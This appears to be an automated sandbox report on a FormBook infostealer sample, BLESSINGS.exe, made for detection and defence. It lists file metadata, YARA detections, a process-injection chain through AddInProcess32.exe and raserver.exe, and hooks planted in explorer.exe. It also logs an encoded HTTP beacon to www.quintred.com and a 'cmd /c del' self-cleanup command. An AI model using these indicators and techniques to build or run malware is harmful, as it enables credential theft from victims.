                                                                            .text0x20000x3440840x344200unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x3480000x62a0x800False0.35595703125data3.6771719498IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x34a0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountry
                                                                            RT_VERSION0x3480a00x3a0data
                                                                            RT_MANIFEST0x3484400x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                            Imports

                                                                            DLLImport
                                                                            mscoree.dll_CorExeMain

                                                                            Version Infos

                                                                            DescriptionData
                                                                            Translation0x0000 0x04b0
                                                                            LegalCopyrightCopyright 2008 AIBD4G:CFD:@><<=EI4<8
                                                                            Assembly Version1.0.0.0
                                                                            InternalNameBLESSINGS.exe
                                                                            FileVersion6.9.12.16
                                                                            CompanyNameAIBD4G:CFD:@><<=EI4<8
                                                                            Comments4H793ADH@:58D93JC7C3EG
                                                                            ProductNameI@J9GGA7CBDA=H:I8@
                                                                            ProductVersion6.9.12.16
                                                                            FileDescriptionI@J9GGA7CBDA=H:I8@
                                                                            OriginalFilenameBLESSINGS.exe

                                                                            Network Behavior

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 13, 2021 21:26:23.389085054 CET4975580192.168.2.691.195.241.137
                                                                            Jan 13, 2021 21:26:23.433885098 CET804975591.195.241.137192.168.2.6
                                                                            Jan 13, 2021 21:26:23.436270952 CET4975580192.168.2.691.195.241.137
                                                                            Jan 13, 2021 21:26:23.436424017 CET4975580192.168.2.691.195.241.137
                                                                            Jan 13, 2021 21:26:23.481056929 CET804975591.195.241.137192.168.2.6
                                                                            Jan 13, 2021 21:26:23.510871887 CET804975591.195.241.137192.168.2.6
                                                                            Jan 13, 2021 21:26:23.510904074 CET804975591.195.241.137192.168.2.6
                                                                            Jan 13, 2021 21:26:23.511102915 CET4975580192.168.2.691.195.241.137
                                                                            Jan 13, 2021 21:26:23.511132002 CET4975580192.168.2.691.195.241.137
                                                                            Jan 13, 2021 21:26:23.555875063 CET804975591.195.241.137192.168.2.6

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 13, 2021 21:24:06.328990936 CET5606153192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:06.376877069 CET53560618.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:07.145781040 CET5833653192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:07.196732998 CET53583368.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:08.151783943 CET5378153192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:08.199799061 CET53537818.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:09.111212015 CET5406453192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:09.161999941 CET53540648.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:09.951495886 CET5281153192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:10.002197027 CET53528118.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:11.236196995 CET5529953192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:11.284121037 CET53552998.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:12.289843082 CET6374553192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:12.342294931 CET53637458.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:13.346986055 CET5005553192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:13.394896030 CET53500558.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:14.592904091 CET6137453192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:14.643692017 CET53613748.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:15.728138924 CET5033953192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:15.776109934 CET53503398.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:35.984093904 CET6330753192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:36.032093048 CET53633078.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:40.249634027 CET4969453192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:40.309444904 CET53496948.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:54.042809010 CET5498253192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:54.103244066 CET53549828.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:24:56.545470953 CET5001053192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:24:56.602050066 CET53500108.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:01.855648041 CET6371853192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:01.915158033 CET53637188.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:04.826375961 CET6211653192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:04.885246992 CET53621168.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:05.572345018 CET6381653192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:05.622982025 CET53638168.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:06.189363956 CET5501453192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:06.240117073 CET53550148.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:06.947381973 CET6220853192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:07.006567001 CET53622088.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:07.615426064 CET5757453192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:07.642710924 CET5181853192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:07.671602964 CET53575748.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:07.710135937 CET53518188.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:08.327656984 CET5662853192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:08.383883953 CET53566288.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:09.497463942 CET6077853192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:10.538269043 CET6077853192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:10.644700050 CET5379953192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:11.267458916 CET53607788.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:11.646994114 CET5379953192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:11.707711935 CET53537998.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:12.463759899 CET5468353192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:12.512481928 CET53546838.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:12.983732939 CET5932953192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:13.040106058 CET53593298.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:39.331732988 CET6402153192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:39.394530058 CET53640218.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:41.298754930 CET5612953192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:41.346676111 CET53561298.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:25:42.776345015 CET5817753192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:25:42.847879887 CET53581778.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:26:02.693787098 CET5070053192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:26:02.767628908 CET53507008.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:26:23.308008909 CET5406953192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:26:23.383419991 CET53540698.8.8.8192.168.2.6
                                                                            Jan 13, 2021 21:27:04.839895010 CET6117853192.168.2.68.8.8.8
                                                                            Jan 13, 2021 21:27:04.901885986 CET53611788.8.8.8192.168.2.6

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                            Jan 13, 2021 21:26:02.693787098 CET192.168.2.68.8.8.80x38eeStandard query (0)www.toweroflifeinc.comA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:26:23.308008909 CET192.168.2.68.8.8.80xa42bStandard query (0)www.quintred.comA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:27:04.839895010 CET192.168.2.68.8.8.80x9d11Standard query (0)www.hotvidzhub.downloadA (IP address)IN (0x0001)

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                            Jan 13, 2021 21:26:02.767628908 CET8.8.8.8192.168.2.60x38eeName error (3)www.toweroflifeinc.comnonenoneA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:26:23.383419991 CET8.8.8.8192.168.2.60xa42bNo error (0)www.quintred.com91.195.241.137A (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:27:04.901885986 CET8.8.8.8192.168.2.60x9d11Name error (3)www.hotvidzhub.downloadnonenoneA (IP address)IN (0x0001)

                                                                            HTTP Request Dependency Graph

                                                                            • www.quintred.com

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.2.64975591.195.241.13780C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Jan 13, 2021 21:26:23.436424017 CET4866OUTGET /jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8P HTTP/1.1
                                                                            Host: www.quintred.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:26:23.510871887 CET4866INHTTP/1.1 302 Found
                                                                            date: Wed, 13 Jan 2021 20:26:23 GMT
                                                                            content-type: text/html; charset=UTF-8
                                                                            content-length: 0
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_T0oGji8ZbUDKitk7mvz/5w6qRssSn9oqweHEj3JMisRyq1Qoa/dizZly+qRNB2xY3VlNem/76Rnt308qbdhrGw==
                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                            pragma: no-cache
                                                                            last-modified: Wed, 13 Jan 2021 20:26:23 GMT
                                                                            location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=quintred.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                                                            x-cache-miss-from: parking-6d4775b86f-szbgp
                                                                            server: NginX
                                                                            connection: close


                                                                            Code Manipulations

                                                                            User Modules

                                                                            Hook Summary

                                                                            Function NameHook TypeActive in Processes
                                                                            PeekMessageAINLINEexplorer.exe
                                                                            PeekMessageWINLINEexplorer.exe
                                                                            GetMessageWINLINEexplorer.exe
                                                                            GetMessageAINLINEexplorer.exe

                                                                            Processes

                                                                            Process: explorer.exe, Module: user32.dll
                                                                            Function NameHook TypeNew Data
                                                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE2
                                                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE2
                                                                            GetMessageWINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE2
                                                                            GetMessageAINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE2

                                                                            Statistics

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            Analysis Process: BLESSINGS.exe PID: 4588 Parent PID: 5948

                                                                            General

                                                                            Start time:21:24:12
                                                                            Start date:13/01/2021
                                                                            Path:C:\Users\user\Desktop\BLESSINGS.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Users\user\Desktop\BLESSINGS.exe'
                                                                            Imagebase:0x710000
                                                                            File size:3427840 bytes
                                                                            MD5 hash:30CB872994E8A0A4A635B06BFBE38006
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:.Net C# or VB.NET
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:low

                                                                            Analysis Process: AddInProcess32.exe PID: 6264 Parent PID: 4588

                                                                            General

                                                                            Start time:21:24:47
                                                                            Start date:13/01/2021
                                                                            Path:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                            Imagebase:0xb60000
                                                                            File size:42080 bytes
                                                                            MD5 hash:F2A47587431C466535F3C3D3427724BE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Antivirus matches:
                                                                            • Detection: 0%, Metadefender, Browse
                                                                            • Detection: 0%, ReversingLabs
                                                                            Reputation:moderate

                                                                            Analysis Process: explorer.exe PID: 3440 Parent PID: 6264

                                                                            General

                                                                            Start time:21:24:52
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\explorer.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:
                                                                            Imagebase:0x7ff6f22f0000
                                                                            File size:3933184 bytes
                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Analysis Process: raserver.exe PID: 6744 Parent PID: 3440

                                                                            General

                                                                            Start time:21:25:13
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\SysWOW64\raserver.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                            Imagebase:0xd90000
                                                                            File size:108544 bytes
                                                                            MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:moderate

                                                                            Analysis Process: cmd.exe PID: 6784 Parent PID: 6744

                                                                            General

                                                                            Start time:21:25:17
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
                                                                            Imagebase:0x2a0000
                                                                            File size:232960 bytes
                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Analysis Process: conhost.exe PID: 7012 Parent PID: 6784

                                                                            General

                                                                            Start time:21:25:18
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff61de10000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Disassembly

                                                                            Code Analysis

                                                                            Reset < >